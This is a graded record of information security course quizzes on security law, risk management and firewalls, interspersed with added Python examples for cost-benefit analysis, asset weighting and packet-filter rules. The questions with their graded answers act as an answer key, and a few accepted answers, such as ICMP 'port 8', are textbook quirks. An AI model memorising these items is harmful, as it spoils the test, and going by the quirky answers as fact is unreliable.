Which of the following acts is also widely known as the Gramm-Leach-Bliley Act? Choose one answer.
a. Financial Services Modernization Act
b. Communications Act
c. Computer Security Act
d. Economic Espionage Act

Correct. Marks for this submission: 2/2.

Question 18 (Marks: 2)

What is the subject of the Computer Security Act? Choose one answer.
a. Federal Agency Information Security
b. Telecommunications Common Carriers
c. Cryptography Software Vendors
d. Banking Industry

Correct. Marks for this submission: 2/2.

Question 19 (Marks: 2)

Software license infringement is also often called software ____________________. Answer: piracy

Correct. Marks for this submission: 2/2.

Question 20 (Marks: 2)

Civil law addresses activities and conduct harmful to society and is actively enforced by the state. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 21 (Marks: 2)

Intellectual privacy is recognized as a protected asset in the United States. Answer: True / False

Incorrect. Marks for this submission: 0/2.

Question 22 (Marks: 2)

What is the subject of the Sarbanes-Oxley Act? Choose one answer.
a. Banking
b. Financial Reporting
c. Privacy
d. Trade secrets

Correct. Marks for this submission: 2/2.

Question 23 (Marks: 2)

Key studies reveal that the overriding factor in leveling the ethical perceptions within a small population is ____________________. Answer: education

Correct. Marks for this submission: 2/2.

Question 24 (Marks: 2)

Deterrence can prevent an illegal or unethical activity from occurring. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 25 (Marks: 2)

The ____________________ is the American contribution to an international effort to reduce the impact of copyright, trademark, and privacy infringement, especially when accomplished via the removal of technological copyright protection measures. Answer: Digital Millennium Copyright Act

Correct. Marks for this submission: 2/2.

Question 26 (Marks: 2)

The Computer ____ and Abuse Act of 1986 is the cornerstone of many computer-related federal laws and enforcement efforts. Choose one answer.
a. Violence
b. Fraud
c. Theft
d. Usage

Correct. Marks for this submission: 2/2.

Question 27 (Marks: 2)

The Council of Europe adopted the Convention on Cybercrime in ____. Choose one answer.
a. 1976
b. 1986
c. 1998
d. 2001

Correct. Marks for this submission: 2/2.

Question 28 (Marks: 2)

The ____________________² manages a body of knowledge on information security and administers and evaluates examinations for information security certifications. Answer: (ISC)

Correct. Marks for this submission: 2/2.

Question 29 (Marks: 2)

In a study on software licence infringement, those from the United States were significantly more permissive. Answer: True / False

Incorrect. Marks for this submission: 0/2.

Question 30 (Marks: 2)

Studies on ethics and computer use reveal that people of different nationalities have different perspectives; difficulties arise when one nationality's ethical behavior violates the ethics of another national group. Answer: True / False

Correct. Marks for this submission: 2/2.

Question 31 (Marks: 2)

The ____________________ Act of 1966 allows any person to request access to federal agency records or information not determined to be a matter of national security. Answer: Freedom of Information

Correct. Marks for this submission: 2/2.

Question 32 (Marks: 2)

Individuals with authorization and privileges to manage information within the organization are most likely to cause harm or damage ____. Choose one answer.
a. with intent
b. by accident
c. with malice
d. with negligence

Correct. Marks for this submission: 2/2.

Question 33 (Marks: 2)

Criminal or unethical ____ goes to the state of mind of the individual performing the act. Choose one answer.
a. attitude
b. intent
c. accident
d. ignorance

Correct. Marks for this submission: 2/2.

Question 34 (Marks: 2)

Which of the following acts defines and formalizes laws to counter threats from computer-related acts and offenses? Choose one answer.
a. Electronic Communications Privacy Act of 1986
b. Freedom of Information Act (FOIA)
c. Computer Fraud and Abuse Act
d. Federal Privacy Act of 1974

Correct. Marks for this submission: 2/2.

Question 35 (Marks: 2)

According to the National Information Infrastructure Protection Act of 1996, the severity of the penalty for computer crimes depends on the value of the information obtained and whether the offense is judged to have been committed for each of the following except ____. Choose one answer.
a. for purposes of commercial advantage
b. for private financial gain
c. to harass
d. in furtherance of a criminal act

Correct. Marks for this submission: 2/2.

Question 36 (Marks: 2)

The National Information Infrastructure Protection Act of 1996 modified which Act? Choose one answer.
a. USA PATRIOT Act
b. USA PATRIOT Improvement and Reauthorization Act
c. Computer Security Act
d. Computer Fraud and Abuse Act

Correct. Marks for this submission: 2/2.

Question 37 (Marks: 2)

Family law, commercial law, and labor law are all encompassed by ____________________ law. Answer: private

Correct. Marks for this submission: 2/2.

Question 38 (Marks: 2)

The ____________________ Act seeks to improve the reliability and accuracy of financial reporting, as well as increase the accountability of corporate governance, in publicly traded companies. Answer: Sarbanes-Oxley

Correct. Marks for this submission: 2/2.

Question39Marks: 2

Which of the following acts is a collection of statutes that regulate the interception of wire, electronic, and oral communications? Choose one answer.a. Electronic Communications Privacy Act

b. Financial Services Modernization Act c. Sarbanes-Oxley Act d. Economic Espionage Act

Correct Marks for this submission: 2/2.

Question40Marks: 2

The ____________________ Act of 1999 contains a number of provisions focusing on facilitating affiliation among banks, securities firms, and insurance companies. Answer:Financial Services Modernization

Correct Marks for this submission: 2/2.

Question41Marks: 2

____________________ are rules that mandate or prohibit certain behavior in society. Answer:Laws

Correct Marks for this submission: 2/2.

Question42Marks: 2

Due care requires that an organization make a valid effort to protect others and continually maintain this level of effort. Answer: True False

Correct Marks for this submission: 2/2.

Question43Marks: 2

Ethics define socially acceptable behaviors. Answer: True False

Correct Marks for this submission: 2/2.

Question44Marks: 2

Individuals with authorization and privileges to manage information within the organization are most likely to cause harm or damage by accident. Answer: True False

Correct Marks for this submission: 2/2.

Question45Marks: 2

In 1995 the Directive 95/46/EC was adopted by the European Union. Answer: True False

Correct Marks for this submission: 2/2.

Question46Marks: 2

The low overall degree of tolerance for ____________________ system use may be a function of the easy association between the common crimes of breaking and entering, trespassing, theft, and destruction of property to their computer-related counterparts. Answer:illicit

Correct Marks for this submission: 2/2.

Question47Marks: 2

The ____ of 1999 provides guidance on the use of encryption and provides protection from government intervention. Choose one answer.a. Sarbanes-Oxley Act

b. Gramm-Leach-Bliley Act c. U.S.A. Patriot Act d. Security and Freedom through Encryption Act

Correct Marks for this submission: 2/2.

Question48Marks: 2

DHS is made up of three directorates. Answer: True False

Correct Marks for this submission: 2/2.

Question49Marks: 2

Guidelines that describe acceptable and unacceptable employee behaviors in the workplace are known as ____________________. Answer:policies

Correct Marks for this submission: 2/2.

Question50Marks: 2

Privacy is not absolute freedom from observation, but rather is a more precise state of being free from unsanctioned intrusion. Answer: True False

Correct Marks for this submission: 2/2.

Question1Marks: 2

A(n) qualitative assessment is based on characteristics that do not use numerical measures. Answer: True False

Correct Marks for this submission: 2/2.

Question2Marks: 2

A(n) exposure factor is the expected percentage of loss that would occur from a particular attack. Answer: True False

Correct Marks for this submission: 2/2.

Question3Marks: 2

Management of classified data includes its storage and ____. Choose one answer.a. distribution

b. portability c. destruction d. All of the above

Correct Marks for this submission: 2/2.

Question4Marks: 2

The difference between an organization's measures and those of others is often referred to as a performance ____________________. Answer:gap

Correct Marks for this submission: 2/2.

Question5Marks: 2

The ____ strategy attempts to shift risk to other assets, other processes, or other organizations. Choose one answer.a. transfer control

b. defend control c. accept control d. mitigate control

Correct Marks for this submission: 2/2.

Question6Marks: 2

ALE determines whether or not a particular control alternative is worth its cost. Answer: True False

Correct Marks for this submission: 2/2.

Question7Marks: 2

Operational ____________________ analysis examines user acceptance and support, management acceptance and support, and the overall requirements of the organization's stakeholders. Answer:feasibility

Correct Marks for this submission: 2/2.

Question8Marks: 2

Cost ____________________ is the process of preventing the financial impact of an incident by implementing a control. Answer:avoidance

Correct Marks for this submission: 2/2.

Question9Marks: 2

Qualitative-based measures are comparisons based on numerical standards, such as numbers of successful attacks. Answer: True False

Correct Marks for this submission: 2/2.

Question10Marks: 2

The concept of competitive ____ refers to falling behind the competition. Choose one answer.a. disadvantage

b. drawback c. failure d. shortcoming

Correct Marks for this submission: 2/2.

Question11Marks: 2

Benefit is the value that an organization realizes by using controls to prevent losses associated with a specific vulnerability. Answer: True False

Correct Marks for this submission: 2/2.

Question12Marks: 2

In the U.S. military classification scheme, ____ data is any information or material the unauthorized disclosure of which reasonably could be expected to cause damage to the national security. Choose one answer.a. confidential

b. secret c. top secret d. sensitive

Correct Marks for this submission: 2/2.

Question13Marks: 2

CBAs cannot be calculated after controls have been functioning for a time. Answer: True False

Correct Marks for this submission: 2/2.

Question14Marks: 2

The ____ security policy is a planning document that outlines the process of implementing security in the organization. Choose one answer.a. program

b. agency c. issue-specific d. system-specific

Correct Marks for this submission: 2/2.

Question15Marks: 2

The military uses a _____-level classification scheme. Choose one answer.a. three

b. four c. five d. six

Correct Marks for this submission: 2/2.

Question16Marks: 2

Major risk is a combined function of (1) a threat less the effect of threat-reducing safeguards, (2) a vulnerability less the effect of vulnerability reducing safeguards, and (3) an asset less the effect of asset value-reducing safeguards. Answer: True False

Correct Marks for this submission: 2/2.

Question17Marks: 2

Asset ____________________ is the process of assigning financial value or worth to each information asset. Answer:valuation

Correct Marks for this submission: 2/2.

Question18Marks: 2

After identifying and performing the preliminary classification of an organization's information assets, the analysis phase moves on to an examination of the ____________________ facing the organization. Answer:information assets

Incorrect Correct answer: threats Marks for this submission: 0/2.

Question19Marks: 2

A(n) ____________________ is a value or profile of a performance metric against which changes in the performance metric can be usefully compared. Answer:baseline

Correct Marks for this submission: 2/2.

Question20Marks: 2

Due ____________________ is the demonstration that the organization is diligent in ensuring that the implemented standards continue to provide the required level of protection. Answer:diligence

Correct Marks for this submission: 2/2.

Question21Marks: 2

The ____________________ control strategy attempts to reduce the impact caused by the exploitation of vulnerability through planning and preparation. Answer:mitigate

Correct Marks for this submission: 2/2.

Question22Marks: 2

Overriding an employee's security ____________________ requires that the need-to-know standard be met. Answer:clearance

Correct Marks for this submission: 2/2.

Question23Marks: 2

Many corporations use a ____ to help secure the confidentiality and integrity of information. Choose one answer.a. system classification scheme

b. data restoration scheme c. data hierarchy d. data classification scheme

Correct Marks for this submission: 2/2.

Question24Marks: 2

Of the three types of mitigation plans, the ____________________ plan is the most strategic and long term. Answer:business continuity

Correct Marks for this submission: 2/2.

Question25Marks: 2

A best practice proposed for a small home office setting is appropriate to help design control strategies for a multinational company. Answer: True False

Correct Marks for this submission: 2/2.

Question26Marks: 2

Best business practices are often called recommended practices. Answer: True False

Incorrect Marks for this submission: 0/2.

Question27Marks: 2

The ____ strategy attempts to prevent the exploitation of the vulnerability. Choose one answer.a. suspend control

b. defend control c. transfer control d. defined control

Correct Marks for this submission: 2/2.

Question28Marks: 2

Risk ____ is the application of controls to reduce the risks to an organization's data and information systems. Choose one answer.a. management

b. control c. identification d. security

Correct Marks for this submission: 2/2.

Question29Marks: 2

A single loss ____________________ is the calculation of the value associated with the most likely loss from an attack. Answer:expentancy

Incorrect Correct answer: expectancy Marks for this submission: 0/2.

Question30Marks: 2

Security ____________________ are the technical implementations of the policies defined by the organization. Answer:technologies

Correct Marks for this submission: 2/2.

Question31Marks: 2

Program-specific policies address the specific implementations or applications of which users should be aware. Answer: True False

Correct Marks for this submission: 2/2.

Question32Marks: 2

The first phase of risk management is ____. Choose one answer.a. risk identification

b. design c. risk control d. risk evaluation

Correct Marks for this submission: 2/2.

Question33Marks: 2

Likelihood risk is the risk to the information asset that remains even after the application of controls. Answer: True False

Correct Marks for this submission: 2/2.

Question34Marks: 2

For hardware devices, the ____________________ number is used by the network operating system to identify a specific network device. Answer:MAC address

Correct Marks for this submission: 2/2.

Question35Marks: 2

The actions an organization can and perhaps should take while an incident is in progress should be specified in a document called the ____ plan. Choose one answer.a. BC

b. DR c. IR d. BR

Correct Marks for this submission: 2/2.

Question36Marks: 2

The formal decision-making process used when considering the economic feasibility of implementing information security controls and safeguards is called a(n) ____. Choose one answer.a. ARO

b. CBA c. ALE d. SLE

Correct Marks for this submission: 2/2.
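The questions in this set on exposure factor, single loss expectancy, ALE and CBA all describe pieces of one calculation. The block below is an added worked example, not part of the course material or the quiz: it implements SLE = AV x EF, ALE = SLE x ARO and CBA = ALE(prior) - ALE(post) - ACS, and applies them to a constructed web-server scenario with two hypothetical control options. Every figure in it (asset value 200,000, EF 0.5, ARO 2, the WAF and premium-service costs and the post-control estimates) is an assumption chosen only to illustrate the arithmetic.

```python
"""Worked cost-benefit analysis (CBA) using the textbook risk formulas.

  SLE = AV x EF        single loss expectancy: value lost in one occurrence
  ALE = SLE x ARO      annualized loss expectancy: expected loss per year
  CBA = ALE(prior) - ALE(post) - ACS
                       ACS is the annualized cost of the safeguard

A control is economically feasible when CBA is positive.
All figures below are constructed for illustration (added example).
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class LossScenario:
    """Loss estimate for one asset/threat pair, before or after a control."""
    asset_value: float      # AV, in currency units
    exposure_factor: float  # EF, fraction of AV lost per occurrence (0.0 .. 1.0)
    aro: float              # annualized rate of occurrence (events per year)

    def __post_init__(self) -> None:
        if not 0.0 <= self.exposure_factor <= 1.0:
            raise ValueError("exposure factor is a percentage of loss: use 0.0 .. 1.0")
        if self.asset_value < 0 or self.aro < 0:
            raise ValueError("asset value and ARO cannot be negative")

    @property
    def sle(self) -> float:
        """Single loss expectancy: the most likely loss from one attack."""
        return self.asset_value * self.exposure_factor

    @property
    def ale(self) -> float:
        """Annualized loss expectancy."""
        return self.sle * self.aro


def cba(prior: LossScenario, post: LossScenario, annual_control_cost: float) -> float:
    """Net annual benefit of a control; positive means the control pays for itself."""
    return prior.ale - post.ale - annual_control_cost


def economically_feasible(prior: LossScenario, post: LossScenario,
                          annual_control_cost: float) -> bool:
    return cba(prior, post, annual_control_cost) > 0


# Constructed example: a public web server valued at 200,000 that is defaced
# about twice a year, losing half its value each time (hypothetical figures).
PRIOR = LossScenario(asset_value=200_000.0, exposure_factor=0.5, aro=2.0)

# Hypothetical control A: a web application firewall costing 30,000 per year,
# estimated to cut both the damage per incident and the frequency.
POST_WAF = LossScenario(asset_value=200_000.0, exposure_factor=0.25, aro=0.5)
WAF_ANNUAL_COST = 30_000.0

# Hypothetical control B: the same reduction, but a vendor quote of 250,000 per year.
PREMIUM_ANNUAL_COST = 250_000.0


if __name__ == "__main__":
    print(f"SLE before control: {PRIOR.sle:,.0f}   ALE before: {PRIOR.ale:,.0f}")
    print(f"ALE with control:   {POST_WAF.ale:,.0f}")
    for name, cost in (("WAF", WAF_ANNUAL_COST), ("premium service", PREMIUM_ANNUAL_COST)):
        verdict = "worth it" if economically_feasible(PRIOR, POST_WAF, cost) else "not worth it"
        print(f"CBA for {name}: {cba(PRIOR, POST_WAF, cost):,.0f} -> {verdict}")
```

ALE on its own says nothing about whether a control is worth buying; only the drop in ALE net of the control's annual cost does, which is why the same control is worth it at one price and not at another. The routine can equally be re-run after a control has been in service for a while, with the estimates replaced by observed loss and frequency figures.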

Question37Marks: 2

Mutually exclusive means that all information assets must fit in the list somewhere. Answer: True False

Correct Marks for this submission: 2/2.

Question38Marks: 2

The ____ security policy is an executive-level document that outlines the organization's approach and attitude towards information security and relates the strategic value of information security within the organization. Choose one answer.a. general

b. agency c. issue-specific d. system-specific

Correct Marks for this submission: 2/2.

Question39Marks: 2

A certificate authority should actually be categorized as a software security component. Answer: True False

Correct Marks for this submission: 2/2.

Question40Marks: 2

Policies are documents that specify an organizations approach to security. Answer: True False

Correct Marks for this submission: 2/2.

Question41Marks: 2

The ____ strategy is the choice to do nothing to protect a vulnerability and to accept the outcome of its exploitation. Choose one answer.a. avoidance of risk

b. transference c. mitigation d. accept control

Correct Marks for this submission: 2/2.

Question42Marks: 2

In a(n) _____, each information asset is assigned a score for each of a set of assigned critical factors. Choose one answer.a. OPSEC

b. COMSEC c. weighted factor analysis d. data classification scheme

Correct Marks for this submission: 2/2.

Question43Marks: 2

A(n) ____________________ desk policy requires that employees secure all information in appropriate storage containers at the end of each day. Answer:clean

Correct Marks for this submission: 2/2.

Question44Marks: 2

Behavioral feasibility is also known as ____________________. Answer:operational feasibility

Correct Marks for this submission: 2/2.

Question45Marks: 2

Once the inventory and value assessment are complete, you can prioritize each asset using a straightforward process known as ____________________ analysis. Answer:weighted factor

Correct Marks for this submission: 2/2.
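An added example of the weighted factor analysis that the two questions above refer to (it is not code from the course material or the quiz): each criterion carries a weight, the weights total 100, every asset gets a 0 to 1 score per criterion, and the assets are ranked by the sum of weight times score. The criteria, weights, assets and scores are constructed for illustration.

```python
"""Weighted factor analysis for prioritising information assets (added example).

Each criterion carries a weight; the weights sum to 100. Each asset is scored
0.0 .. 1.0 on every criterion. An asset's weighted score is the sum of
weight x score over the criteria, and assets are ranked by that score.
Criteria, weights, assets and scores below are constructed for illustration.
"""
from typing import Dict, List, Tuple

# Constructed criteria and weights (must total 100).
CRITERIA_WEIGHTS: Dict[str, float] = {
    "impact_to_revenue": 30,
    "impact_to_profitability": 40,
    "impact_to_public_image": 30,
}

# Constructed asset inventory with a 0.0 .. 1.0 score per criterion.
ASSETS: Dict[str, Dict[str, float]] = {
    "customer order database": {"impact_to_revenue": 1.0, "impact_to_profitability": 1.0, "impact_to_public_image": 0.8},
    "EDI document server":     {"impact_to_revenue": 0.8, "impact_to_profitability": 0.9, "impact_to_public_image": 0.5},
    "public web server":       {"impact_to_revenue": 0.5, "impact_to_profitability": 0.3, "impact_to_public_image": 1.0},
    "employee intranet wiki":  {"impact_to_revenue": 0.1, "impact_to_profitability": 0.2, "impact_to_public_image": 0.2},
}


def validate_weights(weights: Dict[str, float]) -> None:
    """Reject a weighting that does not total 100 (scores would not be comparable)."""
    total = sum(weights.values())
    if abs(total - 100) > 1e-9:
        raise ValueError(f"criteria weights must sum to 100, got {total}")


def weighted_score(scores: Dict[str, float], weights: Dict[str, float]) -> float:
    """Sum of weight x score; refuses missing criteria and out-of-range scores."""
    missing = set(weights) - set(scores)
    if missing:
        raise ValueError(f"asset has no score for criteria: {sorted(missing)}")
    for criterion, value in scores.items():
        if not 0.0 <= value <= 1.0:
            raise ValueError(f"score for {criterion} must be 0.0 .. 1.0, got {value}")
    return sum(weights[c] * scores[c] for c in weights)


def rank_assets(assets: Dict[str, Dict[str, float]],
                weights: Dict[str, float]) -> List[Tuple[str, float]]:
    """Return (asset, weighted score) pairs, highest priority first."""
    validate_weights(weights)
    ranked = [(name, weighted_score(scores, weights)) for name, scores in assets.items()]
    ranked.sort(key=lambda pair: pair[1], reverse=True)
    return ranked


if __name__ == "__main__":
    for name, score in rank_assets(ASSETS, CRITERIA_WEIGHTS):
        print(f"{score:6.1f}  {name}")
```

The ranking, not the absolute score, is the output that matters: it tells the risk identification effort which assets to examine for threats first. Changing the weights (for example, giving public image more than revenue) reorders the list, which is why the weights should be agreed with management before the scoring is done.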

Question46Marks: 2

A(n) disaster recovery plan dictates the actions an organization can and perhaps should take while an incident is in progress. Answer: True False

Incorrect Marks for this submission: 0/2.

Question47Marks: 2

A(n) ____ is an authorization issued by an organization for the repair, modification, or update of a piece of equipment. Choose one answer.a. IP

b. FCO c. CTO d. HTTP

Correct Marks for this submission: 2/2.

Question48Marks: 2

All information that has been approved by management for public release has a(n) ____________________ classification. Answer:external

Correct Marks for this submission: 2/2.

Question49Marks: 2

Comprehensive means that an information asset should fit in only one category. Answer: True False

Correct Marks for this submission: 2/2.

Question50Marks: 2

Risk ____ defines the quantity and nature of risk that organizations are willing to accept as they evaluate the tradeoffs between perfect security and unlimited accessibility. Choose one answer.a. benefit

b. appetite c. acceptance d. avoidance

Correct Marks for this submission: 2/2.

Question1Marks: 2

The application firewall is also known as a(n) ____________________ server. Answer:proxy

Correct Marks for this submission: 2/2.

Question2Marks: 2

A Web server is often exposed to higher levels of risk when placed in the DMZ than when it is placed in the untrusted network. Answer: True False

Correct Marks for this submission: 2/2.

Question3Marks: 2

The architecture of a(n) ____________________ firewall provides a DMZ. Answer:screened subnet

Correct Marks for this submission: 2/2.

Question4Marks: 2

A packet's structure is independent from the nature of the packet. Answer: True False

Incorrect Marks for this submission: 0/2.

Question5Marks: 2

In recent years, the broadband router devices that can function as packet-filtering firewalls have been enhanced to combine the features of ____. Choose one answer.a. UDPs

b. MACs c. WANs d. WAPs

Correct Marks for this submission: 2/2.

Question6Marks: 2

A(n) ____________________ is an information security program that prevents specific types of information from moving between the outside world and the inside world. Answer:firewall

Correct Marks for this submission: 2/2.

Question7Marks: 2

A(n) ____________________ private network is a private and secure network connection between systems that uses the data communication capability of an unsecured and public network. Answer:virtual

Correct Marks for this submission: 2/2.

Question8Marks: 2

A trusted VPN is also known as a(n) ____________________ VPN. Answer:legacy

Correct Marks for this submission: 2/2.

Question9Marks: 2

SESAME uses ____________________ key encryption to distribute secret keys. Answer:public

Correct Marks for this submission: 2/2.

Question10Marks: 2

Traces, formally known as ICMP Echo requests, are used by internal systems administrators to ensure that clients and servers can communicate. Answer: True False

Correct Marks for this submission: 2/2.

Question11Marks: 2

In Kerberos, a(n) ____________________ is an identification card for a particular client that verifies to the server that the client is requesting services and that the client is a valid member of the Kerberos system and therefore authorized to receive services. Answer:ticket

Correct Marks for this submission: 2/2.

Question12Marks: 2

Static filtering is common in network routers and gateways. Answer: True False

Correct Marks for this submission: 2/2.

Question13Marks: 2

A(n) ____________________ filter is a software filter, technically not a firewall, that allows administrators to restrict access to content from within a network. Answer:content

Correct Marks for this submission: 2/2.

Question14Marks: 2

The circuit gateway firewall operates at the ____________________ layer. Answer:transport

Correct Marks for this submission: 2/2.

Question15Marks: 2

SESAME may be obtained free of charge from MIT. Answer: True False

Correct Marks for this submission: 2/2.

Question16Marks: 2

In ____ mode, the data within an IP packet is encrypted, but the header information is not. Choose one answer.a. tunnel

b. transport c. public d. symmetric

Correct Marks for this submission: 2/2.

Question17Marks: 2

A(n) ____________________ dialer is an automatic phone-dialing program that dials every number in a configured range, and checks to see if a person, answering machine, or modem picks up. Answer:war

Correct Marks for this submission: 2/2.

Question18Marks: 2

The restrictions most commonly implemented in packet-filtering firewalls are based on ____. Choose one answer.a. IP source and destination address

b. Direction (inbound or outbound) c. TCP or UDP source and destination port requests d. All of the above

Correct Marks for this submission: 2/2.

Question19Marks: 2

A packet-____________________ firewall installed on a TCP/IP based network typically functions at the IP level and determines whether to drop a packet (deny) or forward it to the next network connection (allow) based on the rules programmed into the firewall. Answer:filtering

Correct Marks for this submission: 2/2.

Question20Marks: 2

The dominant architecture used to secure network access today is the ____ firewall. Choose one answer.a. static

b. bastion c. unlimited d. screened subnet

Correct Marks for this submission: 2/2.

Question21Marks: 2

A(n) perimeter is a segment of the DMZ where additional authentication and authorization controls are put into place to provide services that are not available to the general public. Answer: True False

Correct Marks for this submission: 2/2.

Question22Marks: 2

The proxy server is often placed in an unsecured area of the network or is placed in the ____ zone. Choose one answer.a. fully trusted

b. hot c. demilitarized d. cold

Correct Marks for this submission: 2/2.

Question23Marks: 2

A content filter is essentially a set of scripts or programs that restricts user access to certain networking protocols and Internet locations. Answer: True False

Correct Marks for this submission: 2/2.

Question24Marks: 2

Simple firewall models enforce address ____________________, which are rules designed to prohibit packets with certain addresses or partial addresses from passing through the device. Answer:restrictions

Correct Marks for this submission: 2/2.

Question25Marks: 2

A VPN allows a user to use the Internet into a private network. Answer: True False

Correct Marks for this submission: 2/2.

Question26Marks: 2

First generation firewalls are application-level firewalls. Answer: True False

Correct Marks for this submission: 2/2.

Question27Marks: 2

A(n) ____ is a private data network that makes use of the public telecommunication infrastructure, maintaining privacy through the use of a tunneling protocol and security procedures. Choose one answer.a. SVPN

b. VPN c. SESAME d. KERBES

Correct Marks for this submission: 2/2.

Question28Marks: 2

A content filter is technically a firewall. Answer: True False

Correct Marks for this submission: 2/2.

Question29Marks: 2

In most common implementation models, the content filter has two components: ____. Choose one answer.a. encryption and decryption

b. filtering and encoding c. rating and decryption d. rating and filtering

Correct Marks for this submission: 2/2.

Question30Marks: 2

Circuit gateway firewalls prevent direct connections between one network and another. Answer: True False

Correct Marks for this submission: 2/2.

Question31Marks: 2

Since the bastion host stands as a sole defender on the network perimeter, it is commonly referred to as the ____ host. Choose one answer.a. trusted

b. domain c. single d. sacrificial

Correct Marks for this submission: 2/2.

Question32Marks: 2

Content filters are often called ____________________ firewalls. Answer:reverse

Correct Marks for this submission: 2/2.

Question33Marks: 2

Kerberos ____ provides tickets to clients who request services. Choose one answer.a. KDS

b. TGS c. AS d. VPN

Correct Marks for this submission: 2/2.

Question34Marks: 2

The ____ is an intermediate area between a trusted network and an untrusted network. Choose one answer.a. perimeter

b. DMZ c. domain d. firewall

Incorrect Marks for this submission: 0/2.

Question35Marks: 2

A benefit of a(n) dual-homed host is its ability to translate between many different protocols at their respective data link layers, including Ethernet, token ring, Fiber Distributed Data Interface, and asynchronous transfer mode. Answer: True False

Correct Marks for this submission: 2/2.

Question36Marks: 2

Address grants prohibit packets with certain addresses or partial addresses from passing through the device. Answer: True False

Incorrect Marks for this submission: 0/2.

Question37Marks: 2

ICMP uses port ____ to request a response to a query and can be the first indicator of a malicious attack. Choose one answer.a. 4

b. 7 c. 8 d. 48

Correct Marks for this submission: 2/2.

Question38Marks: 2

ISA Server can use ____ technology. Choose one answer.a. PNP

b. Point to Point Tunneling Protocol c. RAS d. All of the above

Correct Marks for this submission: 2/2.

Question39Marks: 2

Firewalls fall into ____ major processing-mode categories. Choose one answer.a. two

b. three c. four d. five

Correct Marks for this submission: 2/2.

Question40Marks: 2

SOHO assigns non-routing local addresses to the computer systems in the local area network and uses the single ISP-assigned address to communicate with the Internet. Answer: True False

Correct Marks for this submission: 2/2.

Question41Marks: 2

Secure VPNs use security protocols and encrypt traffic transmitted across unsecured public networks like the Internet. Answer: True False

Correct Marks for this submission: 2/2.

Question42Marks: 2

The firewall device is never accessible directly from the ____________________ network. Answer:public

Correct Marks for this submission: 2/2.

Question43Marks: 2

Since the bastion host stands as a sole defender on the network perimeter, it is commonly referred to as the ____________________ host. Answer:sacrificial

Correct Marks for this submission: 2/2.

Question44Marks: 2

A ____ filtering firewall can react to an emergent event and update or create rules to deal with the event. Choose one answer.a. dynamic

b. static c. stateful d. stateless

Correct Marks for this submission: 2/2.
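The packet-filtering questions in this set (restrictions based on source and destination address, direction and port; drop or forward according to programmed rules; address restrictions; and dynamic filtering that creates rules in response to an event) can all be shown in one small rule engine. The block below is an added example and not code from the course material or the quiz: static rules are evaluated first-match-wins with an implicit default deny, and an auto-block rule is created once a single source has had three inbound packets denied. The rule set, the threshold of three and the addresses (taken from the documentation ranges) are constructed assumptions.

```python
"""Packet-filtering firewall rule evaluation (added example, not from the text).

Static rules match on direction, protocol, source/destination address and
destination port; the first matching rule decides, and a packet matching no
rule is dropped (implicit default deny). On top of that, the filter reacts to
an emergent event (repeated denied inbound packets from one source) by
creating a block rule for that source, which is the dynamic behaviour the
questions describe. Addresses are documentation ranges; the rule set and
the threshold are constructed for illustration.
"""
import ipaddress
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class Packet:
    direction: str               # "inbound" or "outbound"
    proto: str                   # "tcp", "udp" or "icmp"
    src: str
    dst: str
    dport: Optional[int] = None  # destination port (None for ICMP)


@dataclass
class Rule:
    action: str                   # "allow" or "deny"
    direction: str = "any"
    proto: str = "any"
    src: str = "0.0.0.0/0"        # CIDR; a partial address is a shorter prefix
    dst: str = "0.0.0.0/0"
    dport: Optional[int] = None   # None matches any port
    comment: str = ""

    def matches(self, p: Packet) -> bool:
        if self.direction != "any" and self.direction != p.direction:
            return False
        if self.proto != "any" and self.proto != p.proto:
            return False
        if ipaddress.ip_address(p.src) not in ipaddress.ip_network(self.src, strict=False):
            return False
        if ipaddress.ip_address(p.dst) not in ipaddress.ip_network(self.dst, strict=False):
            return False
        if self.dport is not None and self.dport != p.dport:
            return False
        return True


class PacketFilter:
    def __init__(self, rules: List[Rule], auto_block_after: int = 3) -> None:
        self.rules = list(rules)
        self.auto_block_after = auto_block_after   # constructed threshold
        self.denied_inbound: Dict[str, int] = {}

    def decide(self, p: Packet) -> str:
        """Return "allow" or "deny" for the packet (first match wins, default deny)."""
        action = "deny"
        for rule in self.rules:
            if rule.matches(p):
                action = rule.action
                break
        if action == "deny" and p.direction == "inbound":
            self._note_denied(p.src)
        return action

    def _note_denied(self, src: str) -> None:
        count = self.denied_inbound.get(src, 0) + 1
        self.denied_inbound[src] = count
        if count == self.auto_block_after:
            # Dynamic filtering: create a rule in response to the event and put it
            # first so it wins over any static allow rule for that source.
            self.rules.insert(0, Rule("deny", "inbound", src=f"{src}/32",
                                      comment="auto-block: repeated denied probes"))


INTERNAL_NET = "10.0.0.0/8"          # assumed trusted network
DMZ_WEB_SERVER = "192.0.2.10/32"     # assumed public web server in the DMZ


def build_filter() -> PacketFilter:
    """Constructed rule set for a screened subnet with one public web server."""
    return PacketFilter([
        Rule("deny", "inbound", src=INTERNAL_NET, comment="anti-spoofing: internal source seen on outside"),
        Rule("allow", "inbound", "tcp", dst=DMZ_WEB_SERVER, dport=443),
        Rule("allow", "inbound", "tcp", dst=DMZ_WEB_SERVER, dport=80),
        Rule("deny", "inbound", "tcp", dport=23, comment="no telnet from outside"),
        Rule("allow", "outbound", src=INTERNAL_NET),
        # anything else falls through to the implicit default deny
    ])


if __name__ == "__main__":
    fw = build_filter()
    for pkt in (Packet("inbound", "tcp", "198.51.100.7", "192.0.2.10", 443),
                Packet("inbound", "tcp", "10.0.0.5", "192.0.2.10", 443),
                Packet("inbound", "udp", "198.51.100.7", "192.0.2.10", 53),
                Packet("outbound", "tcp", "10.1.2.3", "203.0.113.9", 443)):
        print(f"{fw.decide(pkt):5}  {pkt}")
```

Rule order matters: the anti-spoofing deny sits before the allow rules so an inbound packet claiming an internal source never reaches them, and the dynamically created rule is inserted at the top for the same reason. This is static filtering plus a reactive rule; it keeps no connection state, so a reply packet is judged on the same address and port criteria as any other.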

Question45Marks: 2

Telnet protocol packets usually go to TCP port ____. Choose one answer.a. 7

b. 8 c. 14 d. 23

Correct Marks for this submission: 2/2.

Question46Marks: 2

The fifth generation firewalls include the ____________________ proxy, a specialized form that works under Windows NT Executive, which is the kernel of Windows NT. Answer:kernel

Correct Marks for this submission: 2/2.

Question47Marks: 2

Access control is achieved by means of a combination of policies, programs, and technologies. Answer: True False

Incorrect Marks for this submission: 0/2.

Question48Marks: 2

In SESAME, the user is first authenticated to an authentication server and receives a token. The token is then presented to a privilege attribute server as proof of identity to gain a(n) ____. Choose one answer.a. VPN

